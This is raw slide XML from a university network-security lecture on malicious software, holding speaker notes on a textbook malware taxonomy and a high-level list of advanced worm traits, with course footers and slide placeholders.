        <p:nvSpPr>
          <p:cNvPr id="22533" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="744538"/>
            <a:ext cx="4965700" cy="3724275"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22534" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="679450" y="4716463"/>
            <a:ext cx="5435600" cy="4470400"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="96323" tIns="48161" rIns="96323" bIns="48161"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Stallings Fig 19-1.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Taxonomy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>can be divided into two categories: those that need a host program, and those that are independent;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>can also differentiate between those software threats that do not replicate and those that do.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-AU" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-AU" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-8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ICT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ta-IN" smtClean="0"/>
              <a:t>2014/1</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>3413ICT: Network Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{37B49071-1031-45B4-BF5B-90B9CD180624}" type="slidenum">
              <a:rPr lang="en-AU"/>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="959490" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="744538"/>
            <a:ext cx="4965700" cy="3724275"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="959491" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="679133" y="4717137"/>
            <a:ext cx="5436235" cy="4469368"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="96323" tIns="48161" rIns="96323" bIns="48161"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Stallings Fig 19-2.</a:t>
            </a:r>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ICT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ta-IN" smtClean="0"/>
              <a:t>2014/1</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>3413ICT: Network Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{620CA7AE-4CD3-4E94-B72B-CC7C6D3CB6B3}" type="slidenum">
              <a:rPr lang="en-AU"/>
              <a:pPr/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="988162" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="744538"/>
            <a:ext cx="4965700" cy="3724275"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="988163" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="679133" y="4717137"/>
            <a:ext cx="5436235" cy="4469368"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="228600" indent="-228600"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The state of the art in worm technology includes the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>• Multiplatform: not limited to Windows, can attack a variety of O/S’s, esp UNIX. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>• Multiexploit: penetrate systems in a variety of ways</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>• Ultrafast spreading: using prior scan to get addresses of vulnerable machines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>• Polymorphic: adopt virus polymorphic technique to evade detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>• Metamorphic: change both appearance &amp; behavior patterns </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>• Transport vehicles: to spread other distributed attack tools, eg zombies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>• Zero-day exploit: exploit unknown vulnerability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141288" y="609600"/>
            <a:ext cx="4029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400">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>School of Information &amp; Communication Technology</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="1400">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="141288" y="152400"/>
            <a:ext cx="3446462" cy="501650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4098" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1905000"/>
            <a:ext cx="7772400" cy="1295400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr b="1">
                <a:solidFill>
                  <a:srgbClr val="DF0029"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master Title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4099" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="3657600"/>
            <a:ext cx="6400800" cy="1752600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr b="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master subtitle style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="ta-IN" smtClean="0"/>
              <a:t>2010/1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2339975" y="6381750"/>
            <a:ext cx="3384550" cy="304800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr smtClean="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3413ICT Network Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5867400" y="6400800"/>
            <a:ext cx="3124200" cy="304800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{4F212EB8-476B-434B-9DEC-EFAA75F173E7}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>© V. Muthu, Griffith University</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx1"/>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028"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="ta-IN" smtClean="0"/>
              <a:t>2010/1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5"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6" name="Rectangle 1030"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Malicious Software - </a:t>
            </a:r>
            <a:fld id="{0B492DFF-4557-47CC-9D04-A2A170EA8E5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076450" cy="6248400"/>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152400"/>
            <a:ext cx="60769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028"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="ta-IN" smtClean="0"/>
              <a:t>2010/1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5"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6" name="Rectangle 1030"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Malicious Software - </a:t>
            </a:r>
            <a:fld id="{A2129CC7-3B97-4371-AC57-E67D0320689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028"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="ta-IN" smtClean="0"/>
              <a:t>2010/1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5"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6" name="Rectangle 1030"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Malicious Software - </a:t>
            </a:r>
            <a:fld id="{1D2F6299-34D5-4244-835F-8D955FA42441}"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8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="ta-IN" smtClean="0"/>
              <a:t>2010/1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5"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6" name="Rectangle 1030"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Malicious Software - </a:t>
            </a:r>
            <a:fld id="{5666F4B1-8D33-49AA-BB1C-EB3CBEEA874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1028"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="ta-IN" smtClean="0"/>
              <a:t>2010/1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6"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7" name="Rectangle 1030"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Malicious Software - </a:t>
            </a:r>
            <a:fld id="{B8A03F22-CFCE-4F25-AC36-CB9272FE324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1028"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="ta-IN" smtClean="0"/>
              <a:t>2010/1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8"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9" name="Rectangle 1030"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Malicious Software - </a:t>
            </a:r>
            <a:fld id="{AFAB5B30-5F5D-40E2-92A6-236C210B85D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1028"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="ta-IN" smtClean="0"/>
              <a:t>2010/1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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5" name="Rectangle 1030"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Malicious Software - </a:t>
            </a:r>
            <a:fld id="{B626A3F8-DA3F-4A51-9136-97C9BAEFBDE6}"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dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="ta-IN" smtClean="0"/>
              <a:t>2010/1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3"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4" name="Rectangle 1030"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Malicious Software - </a:t>
            </a:r>
            <a:fld id="{0D0C79E5-EB4B-4060-9FC5-DA3ACFB5473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8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="ta-IN" smtClean="0"/>
              <a:t>2010/1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6"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7" name="Rectangle 1030"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Malicious Software - </a:t>
            </a:r>
            <a:fld id="{B9C4DFF2-619C-460F-BFF8-23C731B0CB5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8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
